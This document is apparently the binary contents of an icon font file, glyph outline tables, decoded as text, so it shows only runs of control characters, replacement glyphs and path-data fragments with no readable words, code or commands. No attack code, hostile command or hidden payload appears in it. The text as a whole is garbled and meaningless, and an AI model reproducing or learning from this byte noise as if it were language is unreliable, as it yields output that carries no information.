Z4		�&4&&4�	(88(	����3NR%#"&=#"/&54?62546;2#"54&+"32#!"&=46;54>;2#5#�
�

X	 	;�	@		���%
�0���
��		N'		`4%		@	�

�		
�������9����&"546;2327&54767>32&#"#";6"/&"&=4&"&4?6&+"&46;26/&4626=462?62;2+"&264&"264&"/&'32654/3264&+764&#"54632X		�
 </N!E
)�

(		(
				

(		(
				�			I			,N/< )
E)�		�T	
7.{l
&(	(	'
				

(		(
				

(		(d			I			.7
		(	'&
l��@�$,Hh"&462+"&="&=46;2$"&4622#+"&=764/.5>3"&=#"/&4?6235462z4&&4&@2
@

&@
H�4&&4& &

@
2H H
�
HH
�
@&4&&4�&
0`

�
`&
D�&4&&4F&`
�

`0
&
D�
D$$D
D$$����@4547+"&54?#+"&5457#"'&54?632'&546;232+ EB	B
1g+(	 :���%
B	irBB9,�u	�:	l����	�'2'������;R2+"&5457>354&+54&+"#";;2>=3267"/##546;232��%$�((((�
+C�
@
C 	�&�!�((((�
+ `

����&=2+"&54574>32654'&""/##546;232�$&�&
L#4
4
�
+C�
@
C "�&%�
�"EF	B
+ `

����!u}2"&4%"'.546?632264&+"&?64&"&=4&"/&"+";22?626=4632>54/&63"2"&4�			#-3/*M@'�		
n			

(		(
				

(		(	[						u 5bLA/ 	C_�GP�		(
				

(		(
				(			���	P75!#!"&%2#!"&=46;5#"&=46;235467632+"&=4&"3546;2+ �8(�(8�		� 		`@		P
@+"	
(8	 	@
P		@   (88�	 		 	 		
0�$88(		

�0
		 ��� (08D2#!"&=46;#";2654&'6"&462&"&4626"&46232+"&46�(88(��(88(�Y(88(�(8#F4&&4&�((���&&�&&8(�(88(�(8%8P88(2
&4&&4z((�&4&&4&
����)S^g'.7>75#"&=46;2+762#67>54#";27543230;2=4754&#"32&2#"=�"|WVyeI 		�		 8,
�1

88	
R	�879E

3>Wz�ULp"	 		 	"	$
� =<'
k ?j?�tt������,:#"&7#"'&54?632763!2#!3535#!"&53XJ::��#	�	V
��)5�@�@
�
@DD"��-��" )c��2I

���`�
F73!"&=327'#"'.7#"'&54?632763!2#"'#"'532767z�a		+$����"		�	=$-**
�		@�
�Y(m��h(Z!!pP�����<D47#!".547>5#"'&54?63263!&5462&264&"@<��
:��6# 28P8+!!�6	&

^�*-e>I'3=PppPEh{%6%%6����BM[7#"&547#"&=46;2$"&462#"'&54?632>32467#!"&5%2+.'63�%� B
&@�4&&4&k����>+.B 7!��<,����&
B(�%�!*
 & &4&&4�g�*8B.*+A,B��& 
#:�����W_g%2+"#"/&"&=4&#"&54?6&+"&46;26/&546326=462?6323264&"264&"�&GG&&GG&��((v�G&&GG&&G,((T������$Yb767#".=4&.6?6&+"&463'&?6626=462?62;2+"%4654&#"r
�
G		&

��	

]GG	&�	����
&G���
	I	&&G
~
�����OW���%2+""/&"&=4&"&4?6&+"&46;26/&4626=462?623264&"'""/&"&=4&"&4?6&+"&46;26/&4626=462?62;2#&264&"264&"p			

(		(
				

(		(
	�e55


55


�i			`		(
				

(		(
				

( �5

55



53			����.=I%+57#"'#"&=4?546;232?6;264&"32764/&"�
�J#''#9
�
5
    
�

0,	0
0��
���)�
�P�

��
0	0

0����.MUk%+57#"'#"&=4?546;232?6;232?264/764&"'&"264&"%26545.+56&'"#"3�
�J#''#9
�
5
    
��


""/



��
���)�
�P�

�p


�""a


0�����32+"546;5'&63!2��8�8������**���632"&46325"&463247�
8P88(�8P88(�
��%%6%�K�%%6%���!%"/&=#"&46232&264&"�d8HVzz�z,
�jKKjKd
,z�zzVH8KjKKj�����"/&6767>�/+�

�+/)k&&k�(|+�

�+|(#	''	��1�62/&?'&6?	(	A�j �� j���&g�	DD
�g&����$"&4622#!"&=46;27jKKjK&7O��O7#L#�KjKKjkO7**7O	�/;GS_kw��2+54+"!54+"#"&546;;2=!;2=54+";2=4+";2=4+";254+";2=4+";254+";2=4+";2=4+";2�

(��(

(@(��((((((����p((((((�
��

P
��((l((l((�``�``�((l((l((���/?32+"&=46#2+"&=46346;2+"&5"&=46;2#(�

�
F

�


�

�
(

�

�
�

�

�

�
��

�


�

�
	��� 0BRbr��+"&=46;2+"&=46;2746;2+"&5#+"&=46;22+"&=46346;2+"&5%"&=46;2#"&=46;2#%46;2+"&5�
e

e
�f

f
 
e

e
 f

f
�

e


e

e
�

e

e

e

��
f

f
�P

P
�
P

�

P

	
P

�
P

P
�

P

�
P

P
�
P

P
h

P

���/?O_7+"&=46;246;2+"&52+"&=463"&=463!2#463!2#!"&5"&=463!2#�
e

e
�
e

e
}

e

�



��


��




�P

P
�

P

�
P

P
�@
P

P
�

P

�
P

P
7'&4?62762"��%p�%��	�$p�$����aq#7"/"/&4?'&4?62762�d		
	dd	
		dd		
	dd	
		�d	
		dd		
	dd	
		dd		
	���5=++"=#"=4;54;232"/&=#"&46232&4&"208 88 8�d8HVzz�z,
d�PpPPp 88 88��d
,z�zzVH8d�pPPpP���%-+"=4;2"/&=#"&46232&4&"20���d8HVzz�z,
d�PpPPp  ��d
,z�zzVH8d�pPPpP����)9#".54>7632654&'.?>+"&=46;2�08�gCrC. 	
bFEc$ _
 

 
�"k=g�BrD)L>	"'EcbG'G	�

�

��h�/?O72+"&=4632+"&=463%2+"&546372+"&546372+"&5463�		0		P		0		0		0		�		0		�		0		�	�		�	`	`		`	�	��		 	`	��		�	`	� 		�	����<D%/'&=&''&'&?&47'&767667547676264&"�	&+"	76
"*	&	**	&	*"	77	"*	&	*�B//B/�
5)1

1)5	$
5)1

1)5
##-/B//B����A�D62+"&=4&+"+"&=%#"/&"#"/&54?62546;2�	p		@	p	����"
Z8,��	
`		`	�1���JI�����2"&4654/54&+"327�Α�ΑT:	 	C��Α�Ψ*�		�1��E�"0B%+'4&+"#"&76;;265'32;26/&+"2>5'4&+"3=�	D��bb�((7	.	-bb@4,,�00���+3;3232"/&6;546#!"&=46;2?324&"264&"2�P
X
	��	

X2
�0

�1*1�
|L�
�	��	�
��p

p
11j@�%#!"&=4?63!23373'8� j��U{ p {U����+�@@����92+"&=46303.#"327632#".54632'41463��e,8IggIB2"F`CsB�f%G:��/#g�g,"@BrDf�'R���)S4146;2+"&=463.#"+"&545>322676;2#"&'1+"=46;2#'�/�fM->_
1�Z8b#�=`
1�Z8b#/�fM��/$*L;	Ws.)��L;	Ws.)R�/$*���'3?K!"&5463!2"264"264"264754+";254+";254+";2�`���""""""������� `��h""I""I""�  T  T  ����%2#!"&=46;5462#54&"���Y~YP*<*���H?YY?HH**H���'276#"&#"+"&5&54662^0E;?$h>4

"!Gh] �	)#^

�!

#���/2+"&=46;254&"6;2+"&/&=4�ԖA-

/!q�q!/

-A��j0	-?
�
"OqqO"
�
?-	0j���6/#"&=46;�Yf

fy��Y
�
����#6/#"&=46;.6764'.>�Yf

f�				x��Y
�
)0).��@�'>P6/#"&=46;%.67>54&'.>&'&67>4.'.>.6764'.>�Yf

fB<DD<	!/91	(-)			
)a				y��Y
�
�'~�~'=J';h!�`S	$,.,$6)0).	����#'+=3'3573#75#53'35%3#5##5333#'3#��@����@����@  ` @`@  @  ��@@@�@@@�����@@@� `� �   �#'+/37;?13333333333333333333333333333333			$										���������������������������������������������������=46;2"/&6"264���(��((���(���((����)%"/&=46;2264&""'764/32��(���((2�(��1��(����((���J��(����#/8%#!"&5463!2;2=4+";2=4+"&7!"3�		
��(88(H
���������

X4
8(@(8
nF�  ����
463!2' �@��0p���#'082+#!"&=#"&=4635463!25!%5#"&=#264&"�%	0
��
0	%

	.	@�0	�&%p	`

`	p%�
	.	
��``�`	0�H���"*#!"&546;7>;2324&"26"&462�`X

~X�FdFFd&4H44H0�� !	!�dFFdF�H44H4����+.%2+"&=46;'#32+"&=46;6;2'3'�		�		�		�		�0��^/ 	 		 	@@	 		 	j��������%-%+"&=46;#"&=46;2'3264&#264&+MR6�		  		�9L�W  W�?$4F	0	 	0	T9$a`(��!.!p��@�#+32+"&=46;#"&=46;2@	?P/		�		?P/		�	� 	��	 		 	@	 		��C�-I2+"&=#32+"&=46;#+"&=4632"/&6;5#"&?62+0		 	8(		�		(8	 		 PP00PP0�	`		 ��	 		 	0 		`	��PP�PP�����-I2+"&=#32+"&=46;5#+"&=463&=#/&4?63546�		 	x		�		x	 		[PP�PP��	P		p	 		 	p		P	��PP00PP00����/?7"&=463!2#"&=463!2#2#!"&=4632#!"&=463
���		�`		�		�`		`&&&&@	 		 	�	 		 	����/?2#!"&=4632#!"&=463"&=46;2##"&=46;2�		�`		�		�`		\��� 	 		 	�	 		 	@((�((����/?7"&=463!2#2#!"&=4632#!"&=4632#!"&=463		�				�`		������	 		 	�	 		 	�&&�&&����/?%2#!"&=463%2#!"&=463%2#!"&=463%2#!"&=463�		�`		�		�`		�		�`		�		�`		 	 		 	�	 		 	�	 		 	�	 		 	���/?O_72+"&=4632+"&=4632+"&=4632#!"&=4632#!"&=4632#!"&=463P		@		@		@		@		@		�		��		@		��		@		��		P	@		@	@	@		@	�	@		@	�	 		 	@	 		 	�	 		 	����+;K7'&4?62#!"&=463%2+"&=46372+"&=46372#!"&=463e``D		�`		�����		�`		U``�-	 		 	�&&�&&�	 		 	����+;K7&=462#!"&=463%2+"&=46372+"&=46372#!"&=463`5		�`		�����		�`		U�`�	 		 	�&&�&&�	 		 	@�2#!"&54636/5P���"#n��� &�K��")"&5463!2"264!5'&'&�`���.!!.!h�X�8H ��H!.!!.�pX�8H����.5462"�="
p�p
"=6#X$5"PppP"5$X#
����
6462"7264&#�Α��gLllLYΑ�Α@l�l��`�!"&54>762264&#"&54&"�6,!g�g!-5-		!/		B�4_6I&JhhJ&H8^4�@		/!		.B��@�7.?67/&?624?6#!"&5463!2+!�Z�\
��$Z$ �(��(�@mZ�
\� #Z#��(�`(��@����4;276/+"@0�%%�0���
��
�����54;27676//+"(�%�%%�%�(h��
��
��
��
�����7&4?6'7&4?6'�%%@�%%�

�
��
�

�
��
����%&546���13�6������#"&546;2%+"&546;2�`````��0`����2#!"&5463������`���%&546&546��%%@�%%�

�
@
�

�
@
���+"=&=&54654654;2(�%�%%�%�(t����
��
@
��
��@����+"=&54654;2�0�%%�0��X��
�
��������%#!"&=463!2%"&?62#�
��

�
�p�*�@@

@
39��9��%�?62"/&4#�����������%�%"/.?'&6?62�������������#2"&454+54+"#";;2=32�Α�Α�\8\\8\��Α�΃8\\8\\����2"&4!2=4#!"�Α�Αt����Α�Ώ88����#2"&4'76/&'&??6�Α�ΑrBB(	AA	(BB(	AA	(��Α�ΨAA	(BB(	AA	(BB(����"&46276/&'&��Α�΄��Fh'Α�Α����Fh����+3"&462"7>32;2=4>54&"264��Α��`J+	#	

8H &&'Α�ΑR@		



	&*<�&&����'2"&4$"26454+54+";#";2�Α�Α	""@X��Α��#""�d@���(PX%2++"=.'#"=4;>754;2>7#"=4;.'+"=32+54;24"&462�3N.(FeeF(Fe�,?
))
?,(,?
))
?,(�(.N3eF(FeeF�
?,(,?
))
?,(,?
)y����
2"&4.67�Α�Α�`�4&��`�4��&��Α��`&��4`&4������%"/&4?62!2#!��x

��x��s
 
s����762"/&6?!"&=463!'.���x��

x}��s
 
s����7'&4?62&/+"&5#��s
 
s���x��

x����%"/&4?646;27>���s
 
s���x

��x���&='.54>7546��1D2
#02LP4�

X*@+U,,B)	P
����!2C546;2++"%4;2+"=#"52+"=4;543+"&=4;232
|T( |
(T�
|T�|
(T|
(T�
|T�|
(T�
|T����!2C#"&=4;232%+"=4;54;2+"=#"=4;2+"=46;2+�|
(T��
|T((T|
�(
|T
|T(
(T�XT(
||
(����#%2++"&=#"&=46;546;2�

�
 
�

�
 
�
 
�

�
 
�

����%2#!"&=463�

��

�
 

 
����6%/+"&?&/&6?'.?>'&>;276�	�&�	��	�&�	�r	"	T��T	"	NN	"	T��T	"	N����"&462"264';2574&+"��Α��T&&Z0@'Α�Α��&&������
.9C353#"&53#2#!"&=46;&54632>32!3.#"3264&#" ��
�
 
	� 	
,
4$..$4
��V#!� ����
@
P		P
$4 $$ 4$5"$%����@�'&'.7>3264&#"&546;26762"�u8[5	 @Q}G		�upPP/O�BN��	.%,.
/>0"		TPp/)����!"&547632654.676�#11#q�q7%&
"�2,2M/OqqON9U&% "*=%
@�-%#".'&47>22654&"72"&54732654'6=*�[<oV*����<TTxTT<(88O9	�Pa-O5Paa�T<<TTxT�8O99'
	����0F%27#"&'&4767#"'&54?632632'654&#"654'6320@

4)%[�*i'@_���EN[�*3IT<4'I	

'80)
aPQ%=#:�c&aP;+9<T!98'����H�!%#!"&762"264';2574&+":
� 
�8&&Z0@00���&&�������@�*2++"&?#+"&?'&6;23'&>;2�BBri	B	1g+(	  	(+g1B	i'2'�
�:ll:������	!-9EQo!#!"&%;2=4+";2=4+"';2=4+";2=4+"';2=4+";2=4+"2!546;546;23546;2���@((((�((((�((((P�@0	 	�	 	���((�((t((�((t((�((@000		00		0���;%&=#"/73546%"=4;2'!#+"=4;76;546&5�P;F55 �coF55  �oT�;PPYP(K:9(g8K:9�8�(PP�����2#"'#"&'&>7&54�Ԗ�j83AL9�z�z319JV���>#"&=46;2%+"=46;232".54546;226=46��hW�h��Nt{tO�2<2,PPP|,	Ht;;tG14-44-4;�E/&/&4?62�����=����;�E7'&4?>76"�����C������}�!C%"/&4?625#"/&6;2762+"&="/&4?62"/32vee(�	�
(���
(ee(�	hdd+�
�+
�+dd+���B�.%#!!2"&547#"&547#"&=46;2!2��
 !.!�!.!FF

g
	�� #!!!! W

-�2#!"&546;��`�@@� @D�
%#!"&?63!2%"46;32=I%�pI%��T 	E�@��| | 8v@0�/?T%"&=46;2#3"&=46;2#!"&=46;2#3"&=46;2#2#!"&546;2M&:&��&:&�		�0
	 	�����FF��@	 	
P		�����-5=M!2#!"&546";2=4#2=4&+"#"3264&"62"&4265463264&#"0��`	t@	���dFFdFTH44H4!	
		&���` 	
`J	-$��FdFFd�4H44H4	
		&���"*#"'+++"&=4?&54>32264&"gI%
(
p
�	/Q0Ig�((Ig(
(

N
�0Q/g((������;C����'&'&?&'#"'&76;67'&767667632+/'>'&/'.=&''&'&?&7'&76766754676276>.6'&'&?&'#"'&76;67'&767667632+/'>'&







&	
&	g"	!
&&	
 
!!
 	&&
 
"{#0#0	







&	
&			
			
	

	>##�
(
""
'
 
'

"	
"&
50#0#�		

				

		>##����B�+#"'#"&'&767&5462#"'#"&'32654'�zV<3+.&z��.+3<@hc�9HB�^")3B^��"
6,qO	Q13�� �
&?'&6?6 � j�A	��HD	�g&�����,%+"/&=#"&546?#"&=463!2+*&
�
�
0&*



*� -
h00h
$<v
0

0
��@�19A232#!"=46;5.'&'&=46;5463!2&'#%5#676(
>0>%0%��%0$>0>
h

��@�@#�
88-"4HH
&"-88
(

(�
)--)
���/7?%#"&=#"&?62+7#!"&=46;;26=324&"264&"2(P
X
	��	

X�
�0

�!P!�
|L@
�	��	�
p

p
!!j�����#7&.7>&>676>.2327>�"		
'BF:;-+
+"		
'BF:;-+
�4j
^�"+
+-;:FB'
		"+
+-;:FB'
	c
j4,^�����#"/&?6>7'&?6���p1;[<0����h0<\:2p����.2#!"&54632654/"#"'&#"���.x�A
%#KF	���`���x	FK#%
A����&%2#!"&=46;5462+"&=4&#"���Y}Z
 
+*���f@ZY?

*+g��@�	!+=!#!"&7;2=4+";2=4+"!5463!2@� ����HH�����X((((00����16"&462+"&5.'"&=463+"&5.'"&=463�%5&&5�	0	wT	
t��	0	ː	
V�sF;5&&5%o
	Tw	0	�t
	��	0	Gr�@�#+%#!"&=463!2'!"763!2&"264&"264@� �0� aa3s�``<��`��@�,4$#"/&++"'&547#"&=46;2?632#2@ 	UBUK"%%�UBU	@!TkkT�J�
D5+"#5:%`%5D
��C`C�����;%//&/&?'.?'&6?'&67>7676�.

?>	--	>?

..

?>	--
>?

�-
>?
..
?>
--
>?
//

?>
�'7?%+#*#"&'.=47>763232+"&=46;24&"2d

##GE
	��`
0

0
�
+% $
	�

-+
�

�
��&6>3&'&632#*#"&7.7.7#"&54632+"&=46264&"-�	
EG#('

d�0

0
$
+-

�	
$$#%+

�

�
�������'7?2666+"'.'&54654632+"&=46"264�
+%#$$
�

-+
�

�
��d

'(#G
E
	��`
0

0
������&6>5&547>76;2'''#"&546;2+"&64&"2\
+-

�	
$$#%+

�

�
��	
EG#('

d�0

0
����%"&462'326=4&+764/&"2?64gΑ�Α�L�

�L��8�Α��H

H������%2"&47#";2?64/&"�Α�Α�L�

�L����Α��H

H������%6462"'7;26=2?64/&"2�Α��H

H��YΑ�Α�L�

�L������%"&46254&+"'&"2?64/&"��Α��H

H��'Α�Α�L�

�L��	����
"+17=#>2473#%#&'%#>#64'#&4733"&673%3.P�0:0���Bl#5S��$lSk		r�r		r(�0:0�$lS��l#5S DTT�@  @ �\2K[2\3K�    !>!@"!>!!DTTJ2\3K~\2K�����$'"&4?&67>76264&"�	P&�5%�
J$JDK
�<S$I
�%5�%Q	
KDJ�������+3CSc"/&4?62762"/&4?627622"&4%2#!"&=4632#!"&=4632#!"&=463�I
/
@
H
/
@
\((�		��		 		��		 		��		�	H0
?�
H/	?�((	 		 	@	 		 	�	 		 	�����2/&='&63��P
�����
8��'+%53#!"&=3;2672!546;546;2#5#@��`�	`	��P�@�p0��0		�PP00  �����;%"/&6;5#/&4?635#"&?62+3546&=#32`OO3eOOe3
OO3eOOe3
OOe3OO
3eOOe3OO
3e����&:H6"&462"&4622+.'63*&4622#!"&=46;27'#"&=46;2z4&&4&�4&&4& &
B �\BB\B#0C��C0	!F!�(B
&@�&4&&4&&4&&4F& 
*!B\BB\bC00C
:#
 &�����%K"&4?62?64'&'&5&?66&'&'&?>'&"&'&4?6G,,D,~Y,&	
<C	jY,&	
<C	
,,D,-~,D,Y~,&
	;C<
�Y~,&
	;C<
	-~,D,����%#!"&5467454632632.K5��<T6*^B,J(8�$65KT</JB^,$8(����%%#!"&?5#"&=46;2+3'&=#�(*��*(u

�

��0@,#II#��



�iN
��
����'/7%"/"&46327'#"&462762264&"264&"�		Ft8P88(!!(88P8tF		����	s(88P8!!8P88(s	F������#,!#!"&546;3;#!"&546;#532@
��

H!�
h
��

�y`
(

p
��!X
��

p
I
`������2&6?62&'&6?6?64'&"2?6"++,�"^!!!�@��		�(�3H��-~--�"""_!�?��		�*�K5��-����(#!"&5463!2264&"4/&+";25����6%%6%���>��`��%6%%6h����2#!"&5463������`����/"&=463!2#"&=463!2#"&=463!2#		�		�`		�		�`		�		<	(		(	�	(		(	�	(		(	���'7G2"&42"&42"&4%2#!"&=4632#!"&=4632#!"&=463((((((�		��		@		��		@		��		�((�((�((	 		 	@	 		 	�	 		 	�����*:JZt�7#"'&?63254+"/&?67#"=4;20%2#!"&=463%2#!"&=4632#!"&=463'"=4;5#"54?6;232#"=4>54#"/&763232#>	9�		��		@		��		@		��		�D		


'/		
		�	 		 	�	 		 	��	 		 	�@X�
	���/M%2#!"&=46;&'&546;2#"'&+"3+"&/&54?632;2654�		� 		fH4D%=	+
BW^H4D%=	+
B�	 		 	3I' 
`3I' 
����/?"&=46;2+26=#"&=46;2+"&=2#!"&=463 		�		 /B/ 		�		 ^�^p		�`		�	 		 	�!//!�	 		 	�B^^B���	 		 	���2#!"&54635#75#5#75#��`�����������`��``�``�``�``���'+/?/?/?"/&47627'�    �5555E5555b		��	
U		l	
;W3V`   `555�555�
	��		U
	l		�V3W����'/7<%2+"&5#"&5#"&5463!232264&"264&"75'#p		08P8�8P8@,d�,((\((�d,`	 	(88((88(@0dlp((((�dp��!&+2#!"&546334&#5265#264&"5"75#`

��

@%%@�B//B/`%@@%�
��

@
��%�%�8P88Ph@%�@%W9!2"/&6
	��	
	��	`9	%!"&?62!��
	��	
`	��	'�Y/&4?6�	��	A��
	��	
'�Y546&	��	?
	��	
���2#!"&5463#!#��`�������`����
��3�732"/&6%+"&?62)�ww�w�wwiw
��3�732"/&6)�ww�ww
�4�%#"&?62�ww�ww�:6#!"&=4632>76".#&'&=463!2"��`!y
	v�z4	�	1}��X	
	Ue	Y(&[	����+7#"&=4;2>3#"'&?63264&#"32��0#a6g��g_G
	"	2BIggI+Jb��N'+�͑@		",g�g'!0���7%"/&4?'"/&4?627'"/&4?62762�|(Q		s		.		s		Q(}q�}(Q		s		.		s		Q(|q����D�2#"&?#".?>;2(�.w 
�* ����
�����5EU72+"&=4637#546;5#"&=46;2+32#5##52+"&=463!2+"&=463�

`

H0�(

�

(�0�0H

`

P

`

`
`

`
P0:@
`

`
@:000P
`

`

`

`
����B�-C%'."'0.#""'.&7>75462632#"&'&>3265@57	(74�\\���/!*	�

#+
'"+$
cz



zx�!/
		����/8#"&546;6232#"6"2643+"&546;7#532�h

QJQ
�!*�h
�

�r`
B�
P
  
H!y��

0
h
&`B��`�
 053+"/&46320#41&'&7264&#"26546`�
>	`dKJg,%�%,�		.B		/&&
 GigIB2+00+2�		B.		!/����U$"&462462"7#!"&=4672654&'527267?6/546?6=4&'jKKjK��6J��@0!.!:$00 
$�KjKKj��N5--1KQ!!R

.,, 
*,���BJ2#"&'.=46?6326='.?>326=&7>264&"� gIGg7I?
	9('8
?I73.B!$			P%qEc_DY9�	
	
{(8:'z



	�9X.=+q&%P			���	
!46;235+32#"&546;�����00�`00 ��p�  P�`��������+"&537#!".54767>54675462�4&��	��		H8%:!@%q

	
C,:V

,B&,C������'7"&=463!2+##3264&!"'&763!2�(8
�5KK5 8(�  &&�!	
H@8(�
KjK(8 �&4&�� 	����'3;GSo!54;46;546;23232#";2=432=4+"#"3547#";2=44+";25'3;2=32=4+54+"#"��@
X
p
X
�((�((t(@4((�((
,h
H

H
�� ((@((�TT`(((�����'/KSX%2+"&5#"&5#"&5463!232264&"754+54+"#";;2=32264&"75'#p		08P8�8P8@,d�,((�808808�((�d,`	 	(88((88(@0dlp((�088088�((�dp���
%I3546;2335+32#"&546;4&+54&+"#";;26=3265` � ��@ 	0	 	0		0	 	0	 `00���  P�`���	0		0	 	0		0	����/%#32+535##'53535'575#5#57335#532+3 ``�0u(s0C"0@@0"C0s(u0���PE*EP������".:2#!"&5463!254&+7626=4&"26=4&"p!/Q
��


@	07	�			W			`/!�'
$*

�

(с	�E	�		�		�		�����3#!"&5463!2#"#54&+";26=3;26=4&���`p 	�	 		 	�	 		p��`D	PP		�		PP		�	����+2#!"&546354+54+"#";;2=32���@\8\\8\���`�8\\8\\�a*?62"/&4&4?62"'�``���``ш``
��``�a+7"/&4?'&4?627"/&4?'&4?>2�``���``			��``��``����A�+7"/"/&4?62'62"/"&/&47��``��``			��``���``����A�)7'&4?62762""/&4?62762��``��``��``���``�a?62"/&4 �``�ш``
��a7"/&4?'&4?62�``���``���XA("/"/&4?62��``� �``���X@(7'&4?62762"��``�`�``���@�#2+32#!"&46;7#"&5463!�H

��

H��@���00@�� ������!%%2#!"&=46;;267!463!2!p	&�&	�
=��@�� 	&&	p��P�������2#!"&5463264&"������`�� ��@�2+"&5463264&"�c��`�� ���9%2+"&=46;2+"#2+"&=46;2+"��^B

&��^B

&���B^
0
&@��B^
0
&@���92+"&=46;26=#"&=463#2+"&=46;26=#"&=463�^B

&P�^B

&P��B^
0
&@��B^
0
&@����'/7"&4622"&462"&4 "&4622"&4$2"&42"&40(((((�((��((((B((��((�((�`((�((((�((((B((����2"&4�Α�Α��Α������)2"&4"264&"26464."'.2�Α�ΑU��	
#n#
	-���Α���**6����%2"&4"264&"264>'&"762�Α�ΑU��-�-#n��Α���66*����2"&4"26424+"36264&"�Α�Α������Α���  ��`+3;2#"'##"&46354+54+"#";;2=32264&"6264&"�B^^BC/\/CB^^BX4444�""W""`^�^00^�^�4444@""I""
@�'3?KWco{���)"&5463!254+";2754+";2754+";2754+";2754+";254+";2754+";2754+";2754+";254+";2%54+";2754+";2� ��\((`((`((`((`((��((`((`((`((��(( ��`(( ��((((((((((T((((((((T((((((���.4X.'76#"&#"+"&5&546623256%5'5&'&56765767556�	2	2�;?$i>4

"!Gh0�"(#M'##&>&#7.(!?&#%% *D��	)"^

�!
#�HF
�GH	DDGFFDDHFG������$%"/&4?'&4?62#!"&=463!2����w
��

0
������

 

������+'&76'/&?6/&?'&?6=�=�}	�

�	+		[[			+		[[		+	�

@��*t	�		�	.	PP	/	.	PP	.	�		����@�.76&76&'/&4&4?61'��3N>!0#9T�x�mm�

S)F/,UZR
T
��

^^
����	�6.=#"&67�/� �
�/�`�%-���7%2++"&53#"&5#"&=46;546;27#5376�

(
0
�s�
(

(
0
�s�;;`
0
(

�`

0
(

��`;;�����6>FN"&54>75.546267>767.5462$"264264&""264�
- 2
/B//B/9/B/��						�			0**	)!//!�*!//!*�	
 !///			��			7			�����/?%"&4?62?6/&?62/&?64&""'&4?620		-,~Y,-	(-*<-(		-,~Y,-	(-*<-��G�*	-,Y~,-		(-<*-�(	-,Y~,-		(-<*-����G��z�)12+"&=4>7>54&#"/.762"&4�Bn%%
H

,+?F:((:(�Z@ 1


"
![��)9))9����&735#"&=46;232+"&=462"&4p�6<**<*�0�00�*<**<����6"&46246;2+"&5�/B//Bh
^

B
1B//B/G

��


�S2+"&=46;5#"&54?6;2'2+32+"/+"&=46;7'#"&=46;2763�		`			
0	�		!NN!		CPPC		!NN!		CPP 	 		 	`	 		�`	0	pp	0	ss	0	pp	0	ss���S!2+"&=46;5#"&54?6;22+32+"/+"&=46;7'#"&=46;2763�		`			
0	�		!NN!		CPPC		!NN!		CPP	 		 	`	 		��	0	pp	0	ss	0	pp	0	ss�����%32#!"/&4762%37���`(���|PrD��(`(�(1}PC��@�K%2#"&#"".54654&#"&/054&54632>?03261
! $$#%54@p '#$#**")	2�#$##

0	M
2	20Ek��`�<6"&=4627232+"&=46;5.=46;26=463�P88P8@	WA8		�		8AW		B19T	`8(�(88(�(h	0Bc	"				"	iD(		*3NM80	������%F'&?6546326=46;22+"&=46;5.=7z	
��	
�8(,		L		�		8AW4/2


	�

	�-(8,�0		0*&�				"	iD),'"����
+!2#!"&54%#!"=46;54;2354;232�����X0(�(0��,$4444������8@6/&5#+"&=4675*.767&632347264&"��
(
�
)
	<!":
�			�t�

�!5

		L1-			���,8#"&=&/&6?#".54?>;>322>4.#"�D<b
	3	h1h'dH3 
w�!2Hd'h
1
h	3
	c=C�"����"&462%2?64/764/&"gΑ�Α���ee�8�Α��V�ff�����2"&4'&"2?64�Α�Αj�ee���Α��V�ff�����6462"2?2?64/&"�Α��V�ff�YΑ�Αj�ee�����"&462764/&"'&"2��Α��V�ff�'Α�Α���ee�����B�BJ7"&?6+5#"=4;5.54632+>7#"&?6+"&'"264
DD#R044$9((7$440R#DD ���`DD'1�(
2(98'2
(�1'DDIWWI ����&2%2#!"&=46;5462+"&=4&#"54&"26���Y}Z
 
+*p""���f@ZY?

*+g�00����2"&4264&"62"&4264&"�Α�Α��ll�l�jKKjKf4&&4&��Α���l�ll��KjKKju&4&&4x�$"&46:"&4$2"&4H*<**<t<**<*��<**<*�<**<**<**<**<**<����2"&<62"462"B<**<**<**<**<**<*<**<t<**<*��<**<*����);2#!"&5463264&"265.'"3;265.'"33���,((�uS<U��~f����`��((Su#U<}�#�f����2"&4>4&/&7�Α�Αl���Α��k�����2#!"&5463!2=4#!"���,�����`��88����!"&5463!2'76/&'&���`��Fh `��b��Fh����*!"&5463!23?6/&7'&"?64���`��9�7g7 `��.�9�8	7��A�@&="'.54>3546463276#!"&546;2+!8�-?0	+-FJ/��
��y	3@�H
';(
O)*>&	H��Y`������>2"&2"&46.?67�GΑ�Αv	�B���Α��B�B����#!"&5463!2?6&+"���`��||�p��`�||����5463!2#!"&%'&;26`��d||�`���||����!2#!"&54676/&0`���||���`��||���B�E%#"&'#"&=4;&7#"&=4;>32'&#"32+32+32767	Mp!oH(>�
��
r&",VF@P,(#	
		 
��@�6%2#!"=4;5#"=4;54632'&#"32+354634��$O=7/			TT{`h(�(B7G#
$

@(3����*�A7+"&="'.?6;2654/.'&6;546;22'&+"�,-:$	 	0&"

B
g".A1	 	0&"

B
	�
T-!'0		0"	


4"1G0		0"	

	��@�4#32++"/&=46;267#"=4;&+"&=43!24I	;5L9�S�T'��)U(`(8F��5 (-(��n�:232+32++"=#"=4;5'#"=4;'&6;236?63_P:Xll8llX:PA77�� % \\ % �qH%#q����)27#32++"=#"=4;5#"=46;54;2'32654&#�\��;4444�@QQ�M$((#� (44( -�O�Qۖ)#"(��@�ENRZdh#32++"/#+"/#"=4;'#"=4;'&6;2376;2376;2327#32>?#;'&'#7#136?#4?FU*
9	+7*
9	)TF>0*
m	,
n
.0�x&Q��'Q (�		��		�( (Q		VV		VV		Q(�66/�  	66�  ����;#!"&546;#532�
�
��

Ƞ�
b8
��

�
z�b����)5>;#!"&546;54+";2=4+";254+";257#532�
�
��

�@������`�
b8
��

�
��LTz�b������5OR72"/&6;46;2%232+"&=4?#"&=4637+"/#+"&54?6;23'�PP0	 	 	=8		�	=8		�	G	;*4 ```0		��@	
F	 		
F	 	U	

	�e0������5OR"&?62++"&5232+"&=4?#"&=4637+"/#+"&54?6;23'PP0	 	`	=8		�	=8		�	G	;*4  ``��		0�	
F	 		
F	 	U	

	�e0�����%5EU%2+"&=463'2"/&6;46;2%2+"&=4632+"&=4632#!"&=4630		@		@PP0	 	0		�		�		�				�		 	 		 	@``0		��	 		 	�	 		 		 		 	�����%5EU%2+"&=463"&?62++"&5!2+"&=4632+"&=4632#!"&=4630		@		�PP0	 	p		�		�		�				�		 	 		 	``��		0	 		 	�	 		 		 		 	������7?U"&54?6;232+"&=46;56&/&767.7>264&"2"/&6;46;20	
0			`		
(>%


	$+
�PP0	 	`	 		p	 		 	@�1'#2"
=&

^``0		��������=S%6&/&767.7>264&"'"&54?6;232+"&=46;5'++"&5#"&?62J(>%


	$+
"	
0			`		�P0	 	0P�1'#2"
